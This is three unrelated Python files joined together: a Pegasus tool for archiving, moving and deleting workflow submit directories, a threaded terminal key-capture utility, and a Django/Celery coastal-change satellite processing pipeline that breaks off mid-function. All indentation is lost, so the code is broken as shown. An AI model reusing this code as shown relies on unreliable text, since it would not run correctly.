def is_subworkflow(self):
"Check to see if this workflow is a subworkflow"
return self.wf_uuid != self.root_wf_uuid
def is_archived(self):
"A submit dir is archived if the archive file exists"
return os.path.isfile(self.archname)
def extract(self):
"Extract files from an archived submit dir"
# Locate archive file
if not self.is_archived():
raise SubmitDirException("Submit dir not archived")
# Update record in master db
mdbsession = connection.connect_by_submitdir(
self.submitdir, connection.DBType.MASTER
)
mdb = MasterDatabase(mdbsession)
wf = mdb.get_master_workflow(self.wf_uuid)
if wf is not None:
wf.archived = False
# Untar the files
tar = tarfile.open(self.archname, "r:gz")
tar.extractall(path=self.submitdir)
tar.close()
# Remove the tar file
os.remove(self.archname)
# Commit the workflow changes
mdbsession.commit()
mdbsession.close()
def archive(self):
"Archive a submit dir by adding files to a compressed archive"
# Update record in master db
mdbsession = connection.connect_by_submitdir(
self.submitdir, connection.DBType.MASTER
)
mdb = MasterDatabase(mdbsession)
wf = mdb.get_master_workflow(self.wf_uuid)
if wf is not None:
wf.archived = True
# The set of files to exclude from the archive
exclude = set()
# Exclude braindump file
exclude.add(self.braindump_file)
# We use a temporary file so that we can determine if the archive step
# completed successfully later
tmparchname = os.path.join(self.submitdir, "archive.tmp.tar.gz")
# We use a lock file to determine if cleanup is complete
lockfile = os.path.join(self.submitdir, "archive.cleanup.lock")
# If a previous archive was partially completed, then remove the
# temporary file that was created
if os.path.exists(tmparchname):
os.unlink(tmparchname)
# Exclude the temporary archive name so we don't add it to itself
exclude.add(tmparchname)
# We don't want the lock file to be saved, if it exists
exclude.add(lockfile)
# Also exclude the final archive name in case they try to run it again
exclude.add(self.archname)
# Ignore monitord files. This is needed so that tools like pegasus-statistics
# will consider the workflow to be complete
for name in ["monitord.started", "monitord.done", "monitord.log"]:
exclude.add(os.path.join(self.submitdir, name))
# Exclude stampede db
for db in glob.glob(os.path.join(self.submitdir, "*.stampede.db")):
exclude.add(db)
# Exclude properties file
for prop in glob.glob(os.path.join(self.submitdir, "pegasus.*.properties")):
exclude.add(prop)
# Visit all the files in the submit dir that we want to archive
def visit(dirpath):
for name in os.listdir(dirpath):
filepath = os.path.join(dirpath, name)
if filepath not in exclude:
yield name, filepath
if self.is_archived() and not os.path.exists(lockfile):
raise SubmitDirException("Submit directory already archived")
if not self.is_archived():
# Archive the files
print("Creating archive...")
tar = tarfile.open(name=tmparchname, mode="w:gz")
for name, path in visit(self.submitdir):
tar.add(name=path, arcname=name)
tar.close()
# This "commits" the archive step
os.rename(tmparchname, self.archname)
# Touch lockfile
open(lockfile, "w").close()
# Remove the files and directories
# We do this here, instead of doing it in the loop above
# because we want to make sure there are no errors in creating
# the archive before we start removing files
print("Removing files...")
for name, path in visit(self.submitdir):
if os.path.isfile(path) or os.path.islink(path):
os.remove(path)
else:
shutil.rmtree(path)
# This "commits" the file removal
os.unlink(lockfile)
# Commit the workflow changes
mdbsession.commit()
mdbsession.close()
def move(self, dest):
"Move this submit directory to dest"
dest = os.path.abspath(dest)
if os.path.isfile(dest):
raise SubmitDirException("Destination is a file: %s" % dest)
if os.path.isdir(dest):
if os.path.exists(os.path.join(dest, "braindump.txt")):
raise SubmitDirException("Destination is a submit dir: %s" % dest)
dest = os.path.join(dest, os.path.basename(self.submitdir))
# Verify that we aren't trying to move a subworkflow
if self.is_subworkflow():
raise SubmitDirException(
"Subworkflows cannot be moved independent of the root workflow"
)
# Connect to master database
mdbsession = connection.connect_by_submitdir(
self.submitdir, connection.DBType.MASTER
)
mdb = MasterDatabase(mdbsession)
# Get the workflow record from the master db
db_url = None
wf = mdb.get_master_workflow(self.wf_uuid)
if wf is None:
db_url = connection.url_by_submitdir(
self.submitdir, connection.DBType.WORKFLOW
)
else:
# We found an mdb record, so we need to update it
# Save the master db's pointer
db_url = wf.db_url
# Update the master db's db_url
# Note that this will only update the URL if it is an sqlite file
# located in the submitdir
log.info("Old master db_url: %s" % wf.db_url)
wf.db_url = db_url.replace(self.submitdir, dest)
log.info("New master db_url: %s" % wf.db_url)
# Change the master db's submit_dir
log.info("Old master submit_dir: %s" % wf.submit_dir)
wf.submit_dir = dest
log.info("New master submit_dir: %s" % wf.submit_dir)
# Update the ensemble record if one exists
ew = mdb.get_ensemble_workflow(self.wf_uuid)
if ew is not None:
log.info("Old ensemble submit dir: %s", ew.submitdir)
ew.submitdir = dest
log.info("New ensemble submit dir: %s", ew.submitdir)
# Update the workflow database if we found one
if db_url is not None:
dbsession = connection.connect(db_url)
db = WorkflowDatabase(dbsession)
root_wf = db.get_workflow(self.wf_uuid)
db.update_submit_dirs(root_wf.wf_id, self.submitdir, dest)
dbsession.commit()
dbsession.close()
# Move all the files
shutil.move(self.submitdir, dest)
# Set new paths in the braindump file
self.braindump["submit_dir"] = dest
self.braindump["basedir"] = os.path.dirname(dest)
utils.write_braindump(os.path.join(dest, "braindump.txt"), self.braindump)
# Note that we do not need to update the properties file even though it
# might contain DB URLs because it cannot contain a DB URL with the submit
# dir in it.
# TODO We might want to update all of the absolute paths in the condor submit files
# if we plan on moving workflows that could be resubmitted in the future
# TODO We might want to update the braindump files for subworkflows
# Update master database
mdbsession.commit()
mdbsession.close()
# Finally, update object
self.submitdir = dest
def delete(self):
"Delete this submit dir and its entry in the master db"
# Verify that we aren't trying to move a subworkflow
if self.is_subworkflow():
raise SubmitDirException(
"Subworkflows cannot be deleted independent of the root workflow"
)
# Confirm that they want to delete the workflow
while True:
try:
input = raw_input
except NameError:
pass
answer = (
input(
"Are you sure you want to delete this workflow? This operation cannot be undone. [y/n]: "
)
.strip()
.lower()
)
if answer == "y":
break
if answer == "n":
return
# Connect to master database
mdbsession = connection.connect_by_submitdir(
self.submitdir, connection.DBType.MASTER
)
mdb = MasterDatabase(mdbsession)
# Delete all of the records from the workflow db if they are not using
# an sqlite db that is in the submit dir.
db_url = connection.url_by_submitdir(self.submitdir, connection.DBType.WORKFLOW)
if self.submitdir not in db_url:
dbsession = connection.connect(db_url)
db = WorkflowDatabase(dbsession)
db.delete_workflow(self.wf_uuid)
dbsession.commit()
dbsession.close()
# Delete the workflow
mdb.delete_master_workflow(self.wf_uuid)
# Remove all the files
shutil.rmtree(self.submitdir)
# Update master db
mdbsession.commit()
mdbsession.close()
def attach(self):
"Add a workflow to the master db"
# Verify that we aren't trying to attach a subworkflow
if self.is_subworkflow():
raise SubmitDirException(
"Subworkflows cannot be attached independent of the root workflow"
)
# Connect to master database
mdbsession = connection.connect_by_submitdir(
self.submitdir, connection.DBType.MASTER
)
mdb = MasterDatabase(mdbsession)
# Check to see if it already exists and just update it
wf = mdb.get_master_workflow(self.wf_uuid)
if wf is not None:
print("Workflow is already in master db")
old_submit_dir = wf.submit_dir
if old_submit_dir != self.submitdir:
print("Updating path...")
wf.submit_dir = self.submitdir
wf.db_url = connection.url_by_submitdir(
self.submitdir, connection.DBType.WORKFLOW
)
mdbsession.commit()
mdbsession.close()
return
# Connect to workflow db
db_url = connection.url_by_submitdir(self.submitdir, connection.DBType.WORKFLOW)
dbsession = connection.connect(db_url)
db = WorkflowDatabase(dbsession)
# Get workflow record
wf = db.get_workflow(self.wf_uuid)
if wf is None:
print("No database record for that workflow exists")
return
# Update the workflow record
wf.submit_dir = self.submitdir
wf.db_url = db_url
# Insert workflow record into master db
mwf = MasterWorkflow()
mwf.wf_uuid = wf.wf_uuid
mwf.dax_label = wf.dax_label
mwf.dax_version = wf.dax_version
mwf.dax_file = wf.dax_file
mwf.dag_file_name = wf.dag_file_name
mwf.timestamp = wf.timestamp
mwf.submit_hostname = wf.submit_hostname
mwf.submit_dir = self.submitdir
mwf.planner_arguments = wf.planner_arguments
mwf.user = wf.user
mwf.grid_dn = wf.grid_dn
mwf.planner_version = wf.planner_version
mwf.db_url = wf.db_url
mwf.archived = self.is_archived()
mdbsession.add(mwf)
mdbsession.flush() # We should have the new wf_id after this
# Query states from workflow database
states = db.get_workflow_states(wf.wf_id)
# Insert states into master db
for s in states:
ms = MasterWorkflowstate()
ms.wf_id = mwf.wf_id
ms.state = s.state
ms.timestamp = s.timestamp
ms.restart_count = s.restart_count
ms.status = s.status
mdbsession.add(ms)
mdbsession.flush()
dbsession.commit()
dbsession.close()
mdbsession.commit()
mdbsession.close()
def detach(self, wf_uuid=None):
"Remove any master db entries for the given root workflow"
if self.submitdir_exists:
# Verify that we aren't trying to detach a subworkflow
if self.is_subworkflow():
raise SubmitDirException(
"Subworkflows cannot be detached independent of the root workflow"
)
# Connect to master database
mdbsession = connection.connect_by_submitdir(
self.submitdir, connection.DBType.MASTER
)
mdb = MasterDatabase(mdbsession)
# Check to see if it even exists
wf = mdb.get_master_workflow(self.wf_uuid)
if wf is None:
print("Workflow is not in master DB")
else:
# Delete the workflow (this will delete the master_workflowstate entries as well)
mdb.delete_master_workflow(self.wf_uuid)
# Update the master db
mdbsession.commit()
mdbsession.close()
else:
# Connect to master database
home = expanduser("~")
mdbsession = connection.connect(
"sqlite:///%s/.pegasus/workflow.db" % home,
db_type=connection.DBType.MASTER,
)
mdb = MasterDatabase(mdbsession)
try:
if wf_uuid is None:
wfs = mdb.get_master_workflow_for_submitdir(self.submitdir)
if wfs:
msg = (
"Invalid submit dir: %s, Specify --wf-uuid <WF_UUID> to detach\n"
% self.submitdir
)
msg += (
"\tWorkflow UUID, DAX Label, Submit Hostname, Submit Dir.\n"
)
for wf in wfs:
msg += "\t{}, {}, {}, {}\n".format(
wf.wf_uuid,
wf.dax_label,
wf.submit_hostname,
wf.submit_dir,
)
raise SubmitDirException(msg)
else:
raise SubmitDirException(
"Invalid submit dir: %s" % self.submitdir
)
else:
# Delete
mdb.delete_master_workflow(wf_uuid, submit_dir=self.submitdir)
# Update the master db
mdbsession.commit()
finally:
mdbsession.close()
class ExtractCommand(LoggingCommand):
description = "Extract (uncompress) submit directory"
usage = "Usage: %prog extract SUBMITDIR"
def run(self):
if len(self.args) != 1:
self.parser.error("Specify SUBMITDIR")
SubmitDir(self.args[0]).extract()
class ArchiveCommand(LoggingCommand):
description = "Archive (compress) submit directory"
usage = "Usage: %prog archive SUBMITDIR"
def run(self):
if len(self.args) != 1:
self.parser.error("Specify SUBMITDIR")
SubmitDir(self.args[0]).archive()
class MoveCommand(LoggingCommand):
description = "Move a submit directory"
usage = "Usage: %prog move SUBMITDIR DEST"
def run(self):
if len(self.args) != 2:
self.parser.error("Specify SUBMITDIR and DEST")
SubmitDir(self.args[0]).move(self.args[1])
class DeleteCommand(LoggingCommand):
description = "Delete a submit directory and the associated DB entries"
usage = "Usage: %prog delete SUBMITDIR"
def run(self):
if len(self.args) != 1:
self.parser.error("Specify SUBMITDIR")
SubmitDir(self.args[0]).delete()
class AttachCommand(LoggingCommand):
description = "Attach a submit dir to the master db (dashboard)"
usage = "Usage: %prog attach SUBMITDIR"
def run(self):
if len(self.args) != 1:
self.parser.error("Specify SUBMITDIR")
SubmitDir(self.args[0]).attach()
class DetachCommand(LoggingCommand):
description = "Detach a submit dir from the master db (dashboard)"
usage = "Usage: %prog detach SUBMITDIR"
def __init__(self):
LoggingCommand.__init__(self)
self.parser.add_option(
"-i",
"--wf-uuid",
dest="wf_uuid",
help="Specify wf_uuid of the workflow to be detached.",
)
def run(self):
if len(self.args) != 1:
self.parser.error("Specify SUBMITDIR")
wf_uuid = self.options.wf_uuid
SubmitDir(self.args[0], raise_err=False).detach(wf_uuid=wf_uuid)
class SubmitDirCommand(CompoundCommand):
description = "Manages submit directories"
commands = [
("archive", ArchiveCommand),
("extract", ExtractCommand),
("move", MoveCommand),
("delete", DeleteCommand),
("attach", AttachCommand),
("detach", DetachCommand),
]
aliases = {
"ar": "archive",
"ex": "extract",
"mv": "move",
"rm": "delete",
"at": "attach",
"dt": "detach",
}
def main():
"The entry point for pegasus-submitdir"
SubmitDirCommand().main()
| |
class _Getch:
"""Gets a single character from standard input. Does not echo to the
screen. From http://code.activestate.com/recipes/134892/"""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
try:
self.impl = _GetchMacCarbon()
except(AttributeError, ImportError):
self.impl = _GetchUnix()
def __call__(self): return self.impl()
class _GetchUnix:
def __init__(self):
import tty, sys, termios # import termios now or else you'll get the Unix version on the Mac
def __call__(self):
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
class _GetchWindows:
def __init__(self):
import msvcrt
def __call__(self):
import msvcrt
return msvcrt.getch()
class _GetchMacCarbon:
"""
A function which returns the current ASCII key that is down;
if no ASCII key is down, the null string is returned. The
page http://www.mactech.com/macintosh-c/chap02-1.html was
very helpful in figuring out how to do this.
"""
def __init__(self):
import Carbon
Carbon.Evt #see if it has this (in Unix, it doesn't)
def __call__(self):
import Carbon
if Carbon.Evt.EventAvail(0x0008)[0]==0: # 0x0008 is the keyDownMask
return ''
else:
#
# The event contains the following info:
# (what,msg,when,where,mod)=Carbon.Evt.GetNextEvent(0x0008)[1]
#
# The message (msg) contains the ASCII char which is
# extracted with the 0x000000FF charCodeMask; this
# number is converted to an ASCII character with chr() and
# returned
#
(what,msg,when,where,mod)=Carbon.Evt.GetNextEvent(0x0008)[1]
return chr(msg & 0x000000FF)
import threading
# From http://stackoverflow.com/a/2022629/2924421
class Event(list):
def __call__(self, *args, **kwargs):
for f in self:
f(*args, **kwargs)
def __repr__(self):
return "Event(%s)" % list.__repr__(self)
def getKey():
inkey = _Getch()
import sys
for i in xrange(sys.maxint):
k=inkey()
if k<>'':break
return k
class KeyCallbackFunction():
callbackParam = None
actualFunction = None
def __init__(self, actualFunction, callbackParam):
self.actualFunction = actualFunction
self.callbackParam = callbackParam
def doCallback(self, inputKey):
if not self.actualFunction is None:
if self.callbackParam is None:
callbackFunctionThread = threading.Thread(target=self.actualFunction, args=(inputKey,))
else:
callbackFunctionThread = threading.Thread(target=self.actualFunction, args=(inputKey,self.callbackParam))
callbackFunctionThread.daemon = True
callbackFunctionThread.start()
class KeyCapture():
gotKeyLock = threading.Lock()
gotKeys = []
gotKeyEvent = threading.Event()
keyBlockingSetKeyLock = threading.Lock()
addingEventsLock = threading.Lock()
keyReceiveEvents = Event()
keysGotLock = threading.Lock()
keysGot = []
keyBlockingKeyLockLossy = threading.Lock()
keyBlockingKeyLossy = None
keyBlockingEventLossy = threading.Event()
keysBlockingGotLock = threading.Lock()
keysBlockingGot = []
keyBlockingGotEvent = threading.Event()
wantToStopLock = threading.Lock()
wantToStop = False
stoppedLock = threading.Lock()
stopped = True
isRunningEvent = False
getKeyThread = None
keyFunction = None
keyArgs = None
# Begin capturing keys. A seperate thread is launched that
# captures key presses, and then these can be received via get,
# getAsync, and adding an event via addEvent. Note that this
# will prevent the system to accept keys as normal (say, if
# you are in a python shell) because it overrides that key
# capturing behavior.
# If you start capture when it's already been started, a
# InterruptedError("Keys are still being captured")
# will be thrown
# Note that get(), getAsync() and events are independent, so if a key is pressed:
#
# 1: Any calls to get() that are waiting, with lossy on, will return
# that key
# 2: It will be stored in the queue of get keys, so that get() with lossy
# off will return the oldest key pressed not returned by get() yet.
# 3: All events will be fired with that key as their input
# 4: It will be stored in the list of getAsync() keys, where that list
# will be returned and set to empty list on the next call to getAsync().
# get() call with it, aand add it to the getAsync() list.
def startCapture(self, keyFunction=None, args=None):
# Make sure we aren't already capturing keys
self.stoppedLock.acquire()
if not self.stopped:
self.stoppedLock.release()
raise InterruptedError("Keys are still being captured")
return
self.stopped = False
self.stoppedLock.release()
# If we have captured before, we need to allow the get() calls to actually
# wait for key presses now by clearing the event
if self.keyBlockingEventLossy.is_set():
self.keyBlockingEventLossy.clear()
# Have one function that we call every time a key is captured, intended for stopping capture
# as desired
self.keyFunction = keyFunction
self.keyArgs = args
# Begin capturing keys (in a seperate thread)
self.getKeyThread = threading.Thread(target=self._threadProcessKeyPresses)
self.getKeyThread.daemon = True
self.getKeyThread.start()
# Process key captures (in a seperate thread)
self.getKeyThread = threading.Thread(target=self._threadStoreKeyPresses)
self.getKeyThread.daemon = True
self.getKeyThread.start()
def capturing(self):
self.stoppedLock.acquire()
isCapturing = not self.stopped
self.stoppedLock.release()
return isCapturing
# Stops the thread that is capturing keys on the first opporunity
# has to do so. It usually can't stop immediately because getting a key
# is a blocking process, so this will probably stop capturing after the
# next key is pressed.
#
# However, Sometimes if you call stopCapture it will stop before starting capturing the
# next key, due to multithreading race conditions. So if you want to stop capturing
# reliably, call stopCapture in a function added via addEvent. Then you are
# guaranteed that capturing will stop immediately after the rest of the callback
# functions are called (before starting to capture the next key).
def stopCapture(self):
self.wantToStopLock.acquire()
self.wantToStop = True
self.wantToStopLock.release()
# Takes in a function that will be called every time a key is pressed (with that
# key passed in as the first paramater in that function)
def addEvent(self, keyPressEventFunction, args=None):
self.addingEventsLock.acquire()
callbackHolder = KeyCallbackFunction(keyPressEventFunction, args)
self.keyReceiveEvents.append(callbackHolder.doCallback)
self.addingEventsLock.release()
def clearEvents(self):
self.addingEventsLock.acquire()
self.keyReceiveEvents = Event()
self.addingEventsLock.release()
# Gets a key captured by this KeyCapture, blocking until a key is pressed.
# There is an optional lossy paramater:
# If True all keys before this call are ignored, and the next pressed key
# will be returned.
# If False this will return the oldest key captured that hasn't
# been returned by get yet. False is the default.
def get(self, lossy=False):
if lossy:
# Wait for the next key to be pressed
self.keyBlockingEventLossy.wait()
self.keyBlockingKeyLockLossy.acquire()
keyReceived = self.keyBlockingKeyLossy
self.keyBlockingKeyLockLossy.release()
return keyReceived
else:
while True:
# Wait until a key is pressed
self.keyBlockingGotEvent.wait()
# Get the key pressed
readKey = None
self.keysBlockingGotLock.acquire()
# Get a key if it exists
if len(self.keysBlockingGot) != 0:
readKey = self.keysBlockingGot.pop(0)
# If we got the last one, tell us to wait
if len(self.keysBlockingGot) == 0:
self.keyBlockingGotEvent.clear()
self.keysBlockingGotLock.release()
# Process the key (if it actually exists)
if not readKey is None:
return readKey
# Exit if we are stopping
self.wantToStopLock.acquire()
if self.wantToStop:
self.wantToStopLock.release()
return None
self.wantToStopLock.release()
def clearGetList(self):
self.keysBlockingGotLock.acquire()
self.keysBlockingGot = []
self.keysBlockingGotLock.release()
# Gets a list of all keys pressed since the last call to getAsync, in order
# from first pressed, second pressed, .., most recent pressed
def getAsync(self):
self.keysGotLock.acquire();
keysPressedList = list(self.keysGot)
self.keysGot = []
self.keysGotLock.release()
return keysPressedList
def clearAsyncList(self):
self.keysGotLock.acquire();
self.keysGot = []
self.keysGotLock.release();
def _processKey(self, readKey):
# Append to list for GetKeyAsync
self.keysGotLock.acquire()
self.keysGot.append(readKey)
self.keysGotLock.release()
# Call lossy blocking key events
self.keyBlockingKeyLockLossy.acquire()
self.keyBlockingKeyLossy = readKey
self.keyBlockingEventLossy.set()
self.keyBlockingEventLossy.clear()
self.keyBlockingKeyLockLossy.release()
# Call non-lossy blocking key events
self.keysBlockingGotLock.acquire()
self.keysBlockingGot.append(readKey)
if len(self.keysBlockingGot) == 1:
self.keyBlockingGotEvent.set()
self.keysBlockingGotLock.release()
# Call events added by AddEvent
self.addingEventsLock.acquire()
self.keyReceiveEvents(readKey)
self.addingEventsLock.release()
def _threadProcessKeyPresses(self):
while True:
# Wait until a key is pressed
self.gotKeyEvent.wait()
# Get the key pressed
readKey = None
self.gotKeyLock.acquire()
# Get a key if it exists
if len(self.gotKeys) != 0:
readKey = self.gotKeys.pop(0)
# If we got the last one, tell us to wait
if len(self.gotKeys) == 0:
self.gotKeyEvent.clear()
self.gotKeyLock.release()
# Process the key (if it actually exists)
if not readKey is None:
self._processKey(readKey)
# Exit if we are stopping
self.wantToStopLock.acquire()
if self.wantToStop:
self.wantToStopLock.release()
break
self.wantToStopLock.release()
def _threadStoreKeyPresses(self):
while True:
# Get a key
readKey = getKey()
# Run the potential shut down function
if not self.keyFunction is None:
self.keyFunction(readKey, self.keyArgs)
# Add the key to the list of pressed keys
self.gotKeyLock.acquire()
self.gotKeys.append(readKey)
if len(self.gotKeys) == 1:
self.gotKeyEvent.set()
self.gotKeyLock.release()
# Exit if we are stopping
self.wantToStopLock.acquire()
if self.wantToStop:
self.wantToStopLock.release()
self.gotKeyEvent.set()
break
self.wantToStopLock.release()
# If we have reached here we stopped capturing
# All we need to do to clean up is ensure that
# all the calls to .get() now return None.
# To ensure no calls are stuck never returning,
# we will leave the event set so any tasks waiting
# for it immediately exit. This will be unset upon
# starting key capturing again.
self.stoppedLock.acquire()
# We also need to set this to True so we can start up
# capturing again.
self.stopped = True
self.stopped = True
self.keyBlockingKeyLockLossy.acquire()
self.keyBlockingKeyLossy = None
self.keyBlockingEventLossy.set()
self.keyBlockingKeyLockLossy.release()
self.keysBlockingGotLock.acquire()
self.keyBlockingGotEvent.set()
self.keysBlockingGotLock.release()
self.stoppedLock.release()
| |
from django.db.models import F
from celery.task import task
from celery import chain, group, chord
from celery.utils.log import get_task_logger
from datetime import datetime, timedelta
import xarray as xr
import os
import imageio
from utils.data_cube_utilities.data_access_api import DataAccessApi
from utils.data_cube_utilities.dc_coastal_change import compute_coastal_change, mask_mosaic_with_coastal_change, mask_mosaic_with_coastlines
from utils.data_cube_utilities.dc_utilities import (create_cfmask_clean_mask, create_bit_mask, write_geotiff_from_xr,
write_png_from_xr, add_timestamp_data_to_xr, clear_attrs, convert_range)
from utils.data_cube_utilities.dc_chunker import (create_geographic_chunks, group_datetimes_by_year,
combine_geographic_chunks)
from apps.dc_algorithm.utils import create_2d_plot, _get_datetime_range_containing
from utils.data_cube_utilities.import_export import export_xarray_to_netcdf
from .models import CoastalChangeTask
from apps.dc_algorithm.models import Satellite
from apps.dc_algorithm.tasks import DCAlgorithmBase, check_cancel_task, task_clean_up
logger = get_task_logger(__name__)
class BaseTask(DCAlgorithmBase):
app_name = 'coastal_change'
@task(name="coastal_change.run", base=BaseTask)
def run(task_id=None):
"""Responsible for launching task processing using celery asynchronous processes
Chains the parsing of parameters, validation, chunking, and the start to data processing.
"""
return chain(parse_parameters_from_task.s(task_id=task_id),
validate_parameters.s(task_id=task_id),
perform_task_chunking.s(task_id=task_id),
start_chunk_processing.s(task_id=task_id))()
@task(name="coastal_change.parse_parameters_from_task", base=BaseTask, bind=True)
def parse_parameters_from_task(self, task_id=None):
"""Parse out required DC parameters from the task model.
See the DataAccessApi docstrings for more information.
Parses out platforms, products, etc. to be used with DataAccessApi calls.
If this is a multisensor app, platform and product should be pluralized and used
with the get_stacked_datasets_by_extent call rather than the normal get.
Returns:
parameter dict with all keyword args required to load data.
"""
task = CoastalChangeTask.objects.get(pk=task_id)
parameters = {
'product': task.satellite.get_products(task.area_id)[0],
'time': (datetime(task.time_start, 1, 1), datetime(task.time_end, 12, 31)),
'longitude': (task.longitude_min, task.longitude_max),
'latitude': (task.latitude_min, task.latitude_max),
'measurements': task.satellite.get_measurements()
}
task.execution_start = datetime.now()
if check_cancel_task(self, task): return
task.update_status("WAIT", "Parsed out parameters.")
return parameters
@task(name="coastal_change.validate_parameters", base=BaseTask, bind=True)
def validate_parameters(self, parameters, task_id=None):
"""Validate parameters generated by the parameter parsing task
All validation should be done here - are there data restrictions?
Combinations that aren't allowed? etc.
Returns:
parameter dict with all keyword args required to load data.
-or-
updates the task with ERROR and a message, returning None
"""
task = CoastalChangeTask.objects.get(pk=task_id)
if check_cancel_task(self, task): return
dc = DataAccessApi(config=task.config_path)
validation_params = dict(parameters)
# verify that both the start and end year have acquisitions
for year in parameters['time']:
validation_params.update({'time': (year, year.replace(year=year.year + 1))})
acquisitions = dc.list_acquisition_dates(**validation_params)
if len(acquisitions) < 1:
task.complete = True
task.update_status("ERROR", "There must be at least one acquisition in both the start and ending year.")
return None
if check_cancel_task(self, task): return
task.update_status("WAIT", "Validated parameters.")
if not dc.validate_measurements(parameters['product'], parameters['measurements']):
task.complete = True
task.update_status(
"ERROR",
"The provided Satellite model measurements aren't valid for the product. Please check the measurements listed in the {} model.".
format(task.satellite.name))
return None
dc.close()
return parameters
@task(name="coastal_change.perform_task_chunking", base=BaseTask, bind=True)
def perform_task_chunking(self, parameters, task_id=None):
"""Chunk parameter sets into more manageable sizes
Uses functions provided by the task model to create a group of
parameter sets that make up the arg.
Args:
parameters: parameter stream containing all kwargs to load data
Returns:
parameters with a list of geographic and time ranges
"""
if parameters is None:
return None
task = CoastalChangeTask.objects.get(pk=task_id)
if check_cancel_task(self, task): return
dc = DataAccessApi(config=task.config_path)
dates = dc.list_acquisition_dates(**parameters)
task_chunk_sizing = task.get_chunk_size()
geographic_chunks = create_geographic_chunks(
longitude=parameters['longitude'],
latitude=parameters['latitude'],
geographic_chunk_size=task_chunk_sizing['geographic'])
grouped_dates = group_datetimes_by_year(dates)
# we need to pair these with the first year - subsequent years.
time_chunks = None
if task.animated_product.animation_id == 'none':
# first and last only
time_chunks = [[grouped_dates[task.time_start], grouped_dates[task.time_end]]]
else:
initial_year = grouped_dates.pop(task.time_start)
time_chunks = [[initial_year, grouped_dates[year]] for year in grouped_dates]
dc.close()
if check_cancel_task(self, task): return
task.update_status("WAIT", "Chunked parameter set.")
return {'parameters': parameters, 'geographic_chunks': geographic_chunks, 'time_chunks': time_chunks}
@task(name="coastal_change.start_chunk_processing", base=BaseTask, bind=True)
def start_chunk_processing(self, chunk_details, task_id=None):
"""Create a fully asyncrhonous processing pipeline from paramters and a list of chunks.
The most efficient way to do this is to create a group of time chunks for each geographic chunk,
recombine over the time index, then combine geographic last.
If we create an animation, this needs to be reversed - e.g. group of geographic for each time,
recombine over geographic, then recombine time last.
The full processing pipeline is completed, then the create_output_products task is triggered, completing the task.
"""
if chunk_details is None:
return None
parameters = chunk_details.get('parameters')
geographic_chunks = chunk_details.get('geographic_chunks')
time_chunks = chunk_details.get('time_chunks')
task = CoastalChangeTask.objects.get(pk=task_id)
# This calculation does not account for time chunking because this app
# does not support time chunking.
num_times_fst_lst_yrs = len(time_chunks[0][0]) + len(time_chunks[0][1])
task.total_scenes = len(geographic_chunks) * len(time_chunks) * num_times_fst_lst_yrs
task.scenes_processed = 0
task.save()
if check_cancel_task(self, task): return
task.update_status("WAIT", "Starting processing.")
logger.info("START_CHUNK_PROCESSING")
processing_pipeline = (group([
group([
processing_task.s(
task_id=task_id,
geo_chunk_id=geo_index,
time_chunk_id=time_index,
geographic_chunk=geographic_chunk,
time_chunk=time_chunk,
**parameters) for geo_index, geographic_chunk in enumerate(geographic_chunks)
]) | recombine_geographic_chunks.s(task_id=task_id) for time_index, time_chunk in enumerate(time_chunks)
]) | recombine_time_chunks.s(task_id=task_id) | create_output_products.s(task_id=task_id)\
| task_clean_up.si(task_id=task_id, task_model='CoastalChangeTask')).apply_async()
return True
@task(name="coastal_change.processing_task", acks_late=True, base=BaseTask, bind=True)
def processing_task(self,
task_id=None,
geo_chunk_id=None,
time_chunk_id=None,
geographic_chunk=None,
time_chunk=None,
**parameters):
"""Process a parameter set and save the results to disk.
Uses the geographic and time chunk id to identify output products.
**params is updated with time and geographic ranges then used to load data.
the task model holds the iterative property that signifies whether the algorithm
is iterative or if all data needs to be loaded at once.
Args:
task_id, geo_chunk_id, time_chunk_id: identification for the main task and what chunk this is processing
geographic_chunk: range of latitude and longitude to load - dict with keys latitude, longitude
time_chunk: list of acquisition dates
parameters: all required kwargs to load data.
Returns:
path to the output product, metadata dict, and a dict containing the geo/time ids
"""
chunk_id = "_".join([str(geo_chunk_id), str(time_chunk_id)])
task = CoastalChangeTask.objects.get(pk=task_id)
if check_cancel_task(self, task): return
logger.info("Starting chunk: " + chunk_id)
if not os.path.exists(task.get_temp_path()):
return None
starting_year = _get_datetime_range_containing(*time_chunk[0])
comparison_year = _get_datetime_range_containing(*time_chunk[1])
dc = DataAccessApi(config=task.config_path)
updated_params = parameters
updated_params.update(geographic_chunk)
def _compute_mosaic(time):
"""
Loads data for some time range for the current geographic chunk,
returning 3 objects - the mosaic, the task metadata, and the number of
acquisitions that were in the retrieved data.
"""
updated_params.update({'time': time})
data = dc.get_dataset_by_extent(**updated_params)
if data is None:
logger.info("Empty chunk.")
return None, None, None
if 'time' not in data:
logger.info("Invalid chunk.")
return None, None, None
clear_mask = task.satellite.get_clean_mask_func()(data)
metadata = task.metadata_from_dataset({}, data, clear_mask, updated_params)
return task.get_processing_method()(data, clean_mask=clear_mask, no_data=task.satellite.no_data_value), \
metadata, len(data['time'])
if check_cancel_task(self, task): return
old_mosaic, old_metadata, num_scenes_old = _compute_mosaic(starting_year)
if old_mosaic is None: return None
task.scenes_processed = F('scenes_processed') + num_scenes_old
# Avoid overwriting the task's status if it is cancelled.
task.save(update_fields=['scenes_processed'])
if check_cancel_task(self, task): return
new_mosaic, new_metadata, num_scenes_new = _compute_mosaic(comparison_year)
if new_mosaic is None: return None
task.scenes_processed = F('scenes_processed') + num_scenes_new
task.save(update_fields=['scenes_processed'])
if check_cancel_task(self, task): return
metadata = {**old_metadata, **new_metadata}
# Ensure data variables have the range of Landsat Collection 1 Level 2
# since the color scales are tailored for that dataset.
platform = task.satellite.platform
collection = task.satellite.collection
level = task.satellite.level
mosaics = []
for data in [old_mosaic, new_mosaic]:
if collection != 'c1':
old_dataset = data
drop_vars = [data_var for data_var in old_dataset.data_vars if data_var not in ['red', 'green', 'blue', 'nir', 'swir1', 'swir2']]
data = \
convert_range(data.drop_vars(drop_vars), from_platform=platform,
from_collection=collection, from_level=level,
to_platform=platform, to_collection='c1', to_level='l2')
for drop_var in drop_vars:
data[drop_var] = old_dataset[drop_var]
mosaics.append(data)
old_mosaic, new_mosaic = mosaics
output_product = compute_coastal_change(old_mosaic, new_mosaic, no_data=task.satellite.no_data_value)
if check_cancel_task(self, task): return
path = os.path.join(task.get_temp_path(), chunk_id + ".nc")
export_xarray_to_netcdf(output_product, path)
dc.close()
